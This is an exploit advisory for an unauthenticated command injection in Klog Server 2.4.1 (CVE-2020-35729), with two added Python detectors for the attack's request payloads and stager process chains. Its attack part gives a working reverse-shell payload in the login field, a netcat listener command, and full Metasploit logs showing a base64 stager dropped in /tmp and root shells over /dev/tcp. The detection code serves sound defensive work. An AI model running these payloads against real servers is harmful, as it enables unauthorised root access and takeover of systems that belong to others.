Exploit Title: Klog Server 2.4.1 - Command Injection (Unauthenticated)
Date: 22.12.2020
Exploit Author: b3kc4t (Mustafa GUNDOGDU)
Vendor Homepage: https://www.klogserver.com/
Version: 2.4.1
Tested On: Ubuntu 18.04
CVE: 2020-35729
Description: https://github.com/mustgundogdu/Research/tree/main/KLOG_SERVER
Python
Step 1: set listener
nc -nlvp 98
Step 2: reverse shell
python klog_exploit.py --exploit --url https://10.10.56.51:443/actions/authenticate.php --payload "test\"$bash -i >& /dev/tcp/10.10.56.52/98 0>&1&\""
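The request above carries its command in a login field: the value closes the quoted string and then names a bash /dev/tcp reverse shell. The defender-side counterpart is to score request bodies aimed at the application for those same indicators. The following is an added example written for this page, not code from the advisory or from the klog_exploit.py PoC: it reads constructed request-log lines of the form "<client> <method> <path> <url-encoded body>" (real reverse-proxy or WAF logs differ in shape, and plain access logs usually omit POST bodies), URL-decodes each body, and alerts when strong indicators such as /dev/tcp/ or command substitution appear, while single metacharacters that also occur in legitimate passwords only count towards a threshold. The form field name "login" is an assumption; the advisory does not name the injected parameter.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (not from the advisory); the field name "login" is assumed.
# The second line carries the advisory's payload in URL-encoded form.
SAMPLE_REQUESTS = [
    "10.10.56.52 POST /actions/authenticate.php login=admin&pass=secret",
    "10.10.56.52 POST /actions/authenticate.php "
    "login=test%22%24bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.10.56.52%2F98+0%3E%261%26%22&pass=x",
    "10.10.56.53 POST /actions/authenticate.php login=alice&pass=p%40ss%3Bword",
    "10.10.56.54 GET /index.php q=hello",
]

# Strong indicators: any one of these is enough to alert on its own (3 points each).
STRONG = [
    (re.compile(r"/dev/tcp/"), "bash /dev/tcp network redirection"),
    (re.compile(r"\bbash\s+-i\b"), "interactive bash invocation"),
    (re.compile(r"\$\("), "$( ) command substitution"),
    (re.compile(r"`"), "backtick command substitution"),
]
# Weak indicators: shell metacharacters that also show up in real passwords (1 point per distinct char).
WEAK = re.compile(r"[;|&\"'$<>]")
THRESHOLD = 3


def parse_line(line):
    """Split a constructed log line into its fields and URL-decode the body."""
    client, method, path, body = line.split(" ", 3)
    return {"client": client, "method": method, "path": path, "body": unquote_plus(body)}


def score_body(body):
    """Return (score, reasons): 3 per strong indicator, 1 per distinct weak metacharacter."""
    score, reasons = 0, []
    for pattern, label in STRONG:
        if pattern.search(body):
            score += 3
            reasons.append(label)
    weak = sorted(set(WEAK.findall(body)))
    if weak:
        score += len(weak)
        reasons.append("metacharacters " + "".join(weak))
    return score, reasons


def scan(lines):
    """Return one alert dict per request whose decoded body scores at or above THRESHOLD."""
    alerts = []
    for line in lines:
        req = parse_line(line)
        score, reasons = score_body(req["body"])
        if score >= THRESHOLD:
            alerts.append({"client": req["client"], "path": req["path"],
                           "score": score, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_REQUESTS):
        print(alert)
```

With the constructed lines only the second request alerts; the password containing "@" and ";" scores 2 and stays below the threshold, which is the point of weighting metacharacters separately from the reverse-shell indicators. Bodies must be decoded before matching, otherwise "%2Fdev%2Ftcp%2F" never matches "/dev/tcp/".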
MSF Framework
msf6 > use exploit/linux/http/klog_server_authenticate_user_unauth_command_injection
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > set rhost 192.168.37.152
rhost => 192.168.37.152
msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > set verbose true
verbose => true
msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > show targets
Exploit targets:
Id Name
-- ----
0 Linux (x86)
1 Linux (x64)
2 Linux (cmd)
msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > run
[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Response received after 9 seconds.
[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1towKglAWgCABFcieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/XOXCI.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/qZuQO' < '/tmp/XOXCI.b64' ; chmod +x '/tmp/qZuQO' ; '/tmp/qZuQO' & sleep 2 ; rm -f '/tmp/qZuQO' ; rm -f '/tmp/XOXCI.b64'"]
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (980808 bytes) to 192.168.37.152
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.152:33146) at 2021-02-12 11:17:07 -0600
[*] Command Stager progress - 100.00% done (773/773 bytes)
meterpreter > getuid
Server username: root @ klogserver.klogserver.com (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer : klogserver.klogserver.com
OS : CentOS 7.3.1611 (Linux 3.10.0-514.el7.x86_64)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.37.152 - Meterpreter session 1 closed. Reason: User exit
msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > set target 2
target => 2
msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > run
[+] 0<&45-;exec 45<>/dev/tcp/192.168.37.1/4444;sh <&45 >&45 2>&45
[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Response received after 10 seconds.
[*] Command shell session 2 opened (192.168.37.1:4444 -> 192.168.37.152:33148) at 2021-02-12 11:17:55 -0600
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux klogserver.klogserver.com 3.10.0-514.el7.x86_64 #1 SMP Tue Nov 22 16:42:41 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
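Both Metasploit runs above leave a recognisable trail on the host: the first writes a base64 blob under /tmp, decodes it, marks it executable and runs it from a shell spawned by the web server; the second has that shell open /dev/tcp directly. The following is an added example for this page, not code from the advisory or from Metasploit: it takes constructed process-exec events (dicts with ts, pid, ppid, comm, cmdline, as an EDR or auditd pipeline might emit them), walks each process's parent chain to see whether it descends from a web-server process, and alerts when either a /dev/tcp exec or two or more distinct stager stages occur under the same web-server ancestor within a 60-second window. The /tmp file names XOXCI.b64 and qZuQO are the ones shown in the session above; the stager randomises them on every run, so the rules match on the shape of the chain rather than on names. The base64 content in the sample is a constructed placeholder.

```python
import re
from collections import defaultdict

WEB_SERVERS = {"httpd", "apache2", "nginx", "php-fpm"}
WINDOW = 60  # seconds within which stages are correlated

# Stager stages, matched against the command line of each exec event.
STAGES = [
    ("drop_b64", re.compile(r">>?\s*'?/tmp/[^\s']+\.b64'?")),
    ("decode", re.compile(r"\b(base64\s+(-d|--decode)|openssl\s+enc\s+-d)\b")),
    ("chmod_tmp", re.compile(r"\bchmod\s+\+x\s+'?/tmp/")),
    ("exec_tmp", re.compile(r"^'?/tmp/\S+")),
    ("dev_tcp", re.compile(r"/dev/tcp/")),
]
STRONG_STAGES = {"dev_tcp"}  # a single hit is enough to alert

# Constructed exec events (not real telemetry); file names follow the session above.
SAMPLE_EVENTS = [
    {"ts": 100, "pid": 1000, "ppid": 1, "comm": "httpd", "cmdline": "/usr/sbin/httpd -DFOREGROUND"},
    {"ts": 101, "pid": 2001, "ppid": 1000, "comm": "sh",
     "cmdline": "sh -c echo -n QUFBQUFBQUFBQUFBQUFBQUFBQUFB>>'/tmp/XOXCI.b64' ; "
                "base64 -d - < '/tmp/XOXCI.b64' > '/tmp/qZuQO' ; chmod +x '/tmp/qZuQO' ; "
                "'/tmp/qZuQO' & sleep 2 ; rm -f '/tmp/qZuQO' '/tmp/XOXCI.b64'"},
    {"ts": 102, "pid": 2002, "ppid": 2001, "comm": "base64", "cmdline": "base64 -d -"},
    {"ts": 102, "pid": 2003, "ppid": 2001, "comm": "chmod", "cmdline": "chmod +x /tmp/qZuQO"},
    {"ts": 103, "pid": 2004, "ppid": 2001, "comm": "qZuQO", "cmdline": "/tmp/qZuQO"},
    # benign: one decode under the web server, no other stage
    {"ts": 200, "pid": 2100, "ppid": 1000, "comm": "sh", "cmdline": "sh -c base64 -d /var/www/uploads/img.b64"},
    # the cmd target: the web server's shell opens /dev/tcp itself
    {"ts": 300, "pid": 2200, "ppid": 1000, "comm": "sh",
     "cmdline": "sh -c 0<&45-;exec 45<>/dev/tcp/192.168.37.1/4444;sh <&45 >&45 2>&45"},
    # benign: similar commands under cron, not under a web server
    {"ts": 400, "pid": 3000, "ppid": 1, "comm": "cron", "cmdline": "/usr/sbin/cron"},
    {"ts": 401, "pid": 3001, "ppid": 3000, "comm": "sh",
     "cmdline": "sh -c base64 -d /var/backups/db.b64 > /var/backups/db; chmod +x /tmp/restore.sh"},
]


def classify(cmdline):
    """Return the names of every stager stage the command line matches."""
    return [name for name, pattern in STAGES if pattern.search(cmdline)]


def web_server_ancestor(event, by_pid):
    """Walk the parent chain; return the pid of the first web-server process found, else None."""
    seen, pid = set(), event["ppid"]
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        parent = by_pid[pid]
        if parent["comm"] in WEB_SERVERS:
            return pid
        pid = parent["ppid"]
    return None


def detect_stager(events):
    """Correlate stage hits per web-server ancestor and return one alert per qualifying cluster."""
    by_pid = {e["pid"]: e for e in events}
    hits_by_root = defaultdict(list)  # web-server pid -> [(ts, stage, pid)] in time order
    for event in sorted(events, key=lambda e: e["ts"]):
        stages = classify(event["cmdline"])
        if not stages:
            continue
        root = web_server_ancestor(event, by_pid)
        if root is None:
            continue  # not spawned by a web server: out of scope for this rule
        for stage in stages:
            hits_by_root[root].append((event["ts"], stage, event["pid"]))
    alerts = []
    for root, hits in hits_by_root.items():
        i = 0
        while i < len(hits):
            first_ts = hits[i][0]
            cluster = [h for h in hits[i:] if h[0] - first_ts <= WINDOW]
            names = {h[1] for h in cluster}
            if names & STRONG_STAGES or len(names) >= 2:
                alerts.append({"web_pid": root, "first_ts": first_ts,
                               "stages": sorted(names), "pids": sorted({h[2] for h in cluster})})
            i += len(cluster)
    return alerts


if __name__ == "__main__":
    for alert in detect_stager(SAMPLE_EVENTS):
        print(alert)
```

On the constructed events this yields two alerts under httpd pid 1000: the four-stage drop/decode/chmod/exec cluster at ts 101-103, and the lone /dev/tcp exec at ts 300. The single decode under the web server at ts 200 and the decode-plus-chmod under cron are not reported, which is what the ancestry check and the two-stage threshold are for; tune WINDOW and WEB_SERVERS to the host's actual process names.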